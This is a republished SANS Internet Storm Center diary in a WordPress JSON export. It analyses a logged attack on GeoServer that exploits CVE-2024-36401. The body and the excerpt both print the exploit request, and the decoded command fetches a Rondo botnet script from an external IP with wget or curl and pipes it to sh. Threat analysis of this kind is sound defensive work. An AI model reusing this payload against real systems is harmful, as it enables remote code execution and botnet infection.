{"id":14555,"date":"2026-07-25T04:04:39","date_gmt":"2026-07-25T04:04:39","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/07\/25\/33176\/"},"modified":"2026-07-25T04:04:39","modified_gmt":"2026-07-25T04:04:39","slug":"33176","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/07\/25\/33176\/","title":{"rendered":"Rondo Meets Geoserver, (Wed, Jul 22nd)"},"content":{"rendered":"<p>    Rondo Meets Geoserver, (Wed, Jul 22nd)<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>This isn&#8217;t a new attack, but something I saw &#8220;pop-up&#8221; in our logs this week:<\/p>\n<blockquote>\n<p><code>GET \/geoserver\/wfs?service=WFS&amp;version=2.0.0&amp;request=GetPropertyValue&amp;typeNames=sf:archsites&amp;valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP\/1.1<br \/>\nHost: [redeacted]:8080<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko\/20100101 Firefox\/152.0<br \/>\nConnection: close<br \/>\nAccept: *\/*<\/code><\/p>\n<\/blockquote>\n<p>This attack is associated with\u00a0CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a tool used to manage and manipulate data for geographic information systems (&#8220;maps&#8221;).<\/p>\n<p>URL decoding the URL leads to\u00a0<\/p>\n<blockquote>\n<p><code>\/geoserver\/wfs?service=WFS&amp;version=2.0.0&amp;request=GetPropertyValue&amp;typeNames=sf:archsites&amp;valueReference=exec(java.lang.Runtime.getRuntime(),'bash -c {echo,KHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo}|{base64,-d}|sh')<\/code><\/p>\n<\/blockquote>\n<p>And base64 decoding the string gets us:<\/p>\n<blockquote>\n<p><code>(wget -qO- http:\/\/45.153.34.153\/rondo.``zyt.sh||busybox wget -qO- http:\/\/45.153.34.153\/rondo.``zyt.sh||curl -s http:\/\/45.153.34.153\/rondo.``zyt.sh)|sh<\/code><\/p>\n<\/blockquote>\n<p>So what we have is the &#8220;good old&#8221; Rondo botnet. It has been seen going after Geoserver before. Rondo is often playing little tricks with referense to rappers [1]. In this case, it looks like the botnet was kicked out form the host, and now returns:<\/p>\n<blockquote>\n<p><code>&lt;!-- You won't find it here --&gt;<br \/>\n&lt;!DOCTYPE html&gt;<br \/>\n&lt;html lang=\"en\"&gt;<br \/>\n&lt;head&gt;<br \/>\n\u00a0 &lt;meta charset=\"UTF-8\" \/&gt;<\/code><\/p>\n<\/blockquote>\n<p>or maybe it is still there (see first line?), just not as visible? Makes me miss some of the defacement wars from the late 90s.<\/p>\n<p>\u00a0<\/p>\n<p>&#8212;<br \/>\nJohannes B. Ullrich, Ph.D. , Dean of Research, <a href=\"https:\/\/sans.edu\/\">SANS.edu<\/a><br \/>\n<a href=\"https:\/\/jbu.me\/164\">Twitter<\/a>|<\/p>\n<p> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><\/p>\n<p> \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/isc.sans.edu\/diary\/rss\/33176\">Go to isc.sans.edu<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rondo Meets Geoserver, (Wed, Jul 22nd) This isn&#8217;t a new attack, but something I saw &#8220;pop-up&#8221; in our logs this week: GET \/geoserver\/wfs?service=WFS&amp;version=2.0.0&amp;request=GetPropertyValue&amp;typeNames=sf:archsites&amp;valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP\/1.1 Host: [redeacted]:8080 User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko\/20100101 Firefox\/152.0 Connection: close Accept: *\/* This attack is associated with\u00a0CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[56],"tags":[69],"class_list":["post-14555","post","type-post","status-publish","format-standard","hentry","category-isc-sans-edu","tag-isc-sans-edu"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/14555"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=14555"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/14555\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=14555"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=14555"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=14555"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}